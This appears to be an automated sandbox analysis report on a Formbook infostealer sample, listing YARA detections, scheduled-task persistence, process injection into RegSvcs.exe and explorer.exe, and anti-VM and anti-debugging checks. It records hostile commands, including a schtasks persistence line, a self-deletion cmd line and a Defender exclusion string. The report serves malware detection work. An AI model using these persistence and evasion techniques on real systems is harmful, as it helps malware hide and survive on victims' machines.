Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: YNzE2QUkvaTK7kd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VVhTSSmjNa.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@3/3
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_01
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Mutant created: \Sessions\1\BaseNamedObjects\iUKpdefZfVWfUzOCQt
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Local\Temp\tmp27F.tmp Jump to behavior
Source: YNzE2QUkvaTK7kd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: YNzE2QUkvaTK7kd.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File read: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe 'C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe'
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp' Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: YNzE2QUkvaTK7kd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YNzE2QUkvaTK7kd.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.701470628.00000000017C0000.00000040.00000001.sdmp, ipconfig.exe, 00000009.00000002.912250730.00000000033C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, ipconfig.exe
Source: Binary string: RegSvcs.pdb source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_018404D0 push C033017Eh; ret 0_2_018404E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00417C05 push cs; iretd 6_2_00417C22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040AE9D push edi; ret 6_2_0040AE9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040B7E3 push es; ret 6_2_0040B7EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0183D0D1 push ecx; ret 6_2_0183D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0343D0D1 push ecx; ret 9_2_0343D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CEB5 push eax; ret 9_2_02E1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E0AE9D push edi; ret 9_2_02E0AE9F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E0B7E3 push es; ret 9_2_02E0B7EA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF6C push eax; ret 9_2_02E1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF02 push eax; ret 9_2_02E1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF0B push eax; ret 9_2_02E1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E17C05 push cs; iretd 9_2_02E17C22
Source: initial sample Static PE information: section name: .text entropy: 7.95067945921
Source: initial sample Static PE information: section name: .text entropy: 7.95067945921

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEA
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YNzE2QUkvaTK7kd.exe PID: 6860, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002E098E4 second address: 0000000002E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002E09B5E second address: 0000000002E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe TID: 6864 Thread sleep time: -101616s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe TID: 6892 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7036 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7036 Thread sleep time: -68000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1744 Thread sleep time: -65000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 101616 Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.684736285.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: vmware
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.680533205.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.684736285.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.678461920.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.685038771.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.685138385.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C182 mov eax, dword ptr fs:[00000030h] 6_2_0180C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A185 mov eax, dword ptr fs:[00000030h] 6_2_0181A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB171 mov eax, dword ptr fs:[00000030h] 6_2_017EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB171 mov eax, dword ptr fs:[00000030h] 6_2_017EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812990 mov eax, dword ptr fs:[00000030h] 6_2_01812990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC962 mov eax, dword ptr fs:[00000030h] 6_2_017EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018669A6 mov eax, dword ptr fs:[00000030h] 6_2_018669A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018161A0 mov eax, dword ptr fs:[00000030h] 6_2_018161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018161A0 mov eax, dword ptr fs:[00000030h] 6_2_018161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A49A4 mov eax, dword ptr fs:[00000030h] 6_2_018A49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A49A4 mov eax, dword ptr fs:[00000030h] 6_2_018A49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A49A4 mov eax, dword ptr fs:[00000030h] 6_2_018A49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A49A4 mov eax, dword ptr fs:[00000030h] 6_2_018A49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018651BE mov eax, dword ptr fs:[00000030h] 6_2_018651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018651BE mov eax, dword ptr fs:[00000030h] 6_2_018651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018651BE mov eax, dword ptr fs:[00000030h] 6_2_018651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018651BE mov eax, dword ptr fs:[00000030h] 6_2_018651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov eax, dword ptr fs:[00000030h] 6_2_018099BF
